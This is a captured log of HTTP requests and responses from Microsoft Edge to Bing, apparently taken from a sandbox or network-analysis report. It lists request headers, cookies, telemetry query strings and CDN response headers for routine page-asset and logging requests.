cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:29:57 GMT
etag: 0x8DCEC86967FA2A4
content-type: text/css; charset=utf-8
content-md5: yxQVEL8D2yYKzOkWuxDcBg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8c7a6c74-e01e-0054-6fe1-20001a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 375
cache-control: public, no-transform, max-age=374069
expires: Sun, 16 Mar 2025 10:31:32 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df4dc
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/vDjLjnEkXEuH2C8u3tT0A004qwQ.br.css

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/vDjLjnEkXEuH2C8u3tT0A004qwQ.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/css,*/*;q=0.1
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:40:29 GMT
etag: 0x8DCEC880F396E3D
akamai-grn: 0.4c1a1202.1736629347.af5fa396
content-type: text/css
content-md5: Twb1SQrgn66TMkCHmLv8IQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 83142a0a-b01e-006e-6f86-1e43b9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 301
cache-control: public, no-transform, max-age=64009
expires: Wed, 12 Mar 2025 20:23:52 GMT
date: Wed, 12 Mar 2025 02:37:03 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.d78f655f.1741747023.32df4db
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267d0f34ebdd34e04a70a09db64ac7e27%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1741747022963%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267d0f34ebdd34e04a70a09db64ac7e27%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1741747022963%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1741747022980%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%22%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1741747022980%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%22%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022984%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023063%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1741747023200%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22ARElementIndex%22%3A0%2C%22ARElementOffsetTop%22%3A0%2C%22ARElementOffsetLeft%22%3A0%2C%22ARElementWidth%22%3A1072%2C%22ARElementHeight%22%3A463%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225137%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%5D

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267d0f34ebdd34e04a70a09db64ac7e27%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1741747022963%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267d0f34ebdd34e04a70a09db64ac7e27%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1741747022963%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1741747022980%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%22%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1741747022980%2C%22Name%22%3A%22ShowBubble%22%2C%22FID%22%3A%22%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747022984%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1741747023063%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1741747023200%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22ARElementIndex%22%3A0%2C%22ARElementOffsetTop%22%3A0%2C%22ARElementOffsetLeft%22%3A0%2C%22ARElementWidth%22%3A1072%2C%22ARElementHeight%22%3A463%2C%22ARElementDisplayed%22%3Atrue%2C%22ARElementKValue%22%3A%225137%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1741747023203%2C%22Name%22%3A%22ARElementLoad%22%2C%22FID%22%3A%22Magazine%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df556
GET

https://www.bing.com/rp/qZeFzs7d4zbqMjvSUX0ww-DN1bY.png

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /rp/qZeFzs7d4zbqMjvSUX0ww-DN1bY.png HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

expires: Wed, 12 Mar 2025 21:47:42 GMT
last-modified: Tue, 24 Sep 2024 07:03:10 GMT
etag: 0x8DCDC66F3647E2D
cache-control: public, no-transform, max-age=184690
akamai-grn: 0.6f6e5668.1737942686.9e20dda
content-length: 763
content-type: image/png
content-md5: n4UJiOYHnssveuz4xme87A==
x-ms-request-id: 725356a6-301e-0012-5db1-1cde8c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
timing-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df570
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum2%22,%22SDK%22:%22SJ%22}]

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum2%22,%22SDK%22:%22SJ%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df576
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f2%22,%22SDK%22:%22SJ%22}]

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f2%22,%22SDK%22:%22SJ%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: USRLOC=HS=1&ELOC=LAT=53.5682487487793|LON=-2.491116523742676|N=Bolton%2C%20Greater%20Manchester|ELT=4|
cookie: SRCHUSR=DOB=20250312&T=1741747022000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2025-03-11T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2025-03-12T02:37:03.7285063+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2025-03-12
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2731&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 12 Mar 2025 02:37:03 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747023.32df575
GET

https://www.bing.com/fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22,%22SDK%22:%22SJ%22}]

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /fd/ls/l?IG=C6B6495D728647ADA3098FCFDAE1CBA9&CID=151CAB4AF5806A13125EBEE7F4A86B5E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22,%22SDK%22:%22SJ%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
